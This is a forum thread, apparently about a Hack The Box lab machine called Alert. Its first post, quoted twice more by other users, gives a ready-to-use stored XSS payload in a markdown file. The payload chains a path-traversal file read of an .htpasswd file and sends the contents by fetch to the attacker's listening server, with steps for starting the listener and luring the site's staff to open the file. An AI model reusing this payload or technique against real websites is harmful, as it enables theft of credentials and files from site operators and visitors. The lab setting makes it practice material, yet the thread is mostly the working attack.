[SSKK]

upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

On localhost  -->

python3 -m http.server 80

after clicking on View Markdown click on Share Markdown

then copy the link of that shared markdown url and paste it in the Contact Us page and send it.

you'll get something like this https://i.postimg.cc/RFVw9yzy/Screenshot.png


doneeeee

[unplexus]

thanks for the post explaining this! was stuck here for a bit.

[mrtyry3132123]

upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

Hi! How did you discover LFI vulnerability in 'http://alert.htb/messages.php?file='?

[QuackTheCode]

upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

On localhost  -->

python3 -m http.server 80

after clicking on View Markdown click on Share Markdown

then copy the link of that shared markdown url and paste it in the Contact Us page and send it.

you'll get something like this https://i.postimg.cc/RFVw9yzy/Screenshot.png


doneeeee

Thanks man, much appreciated

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.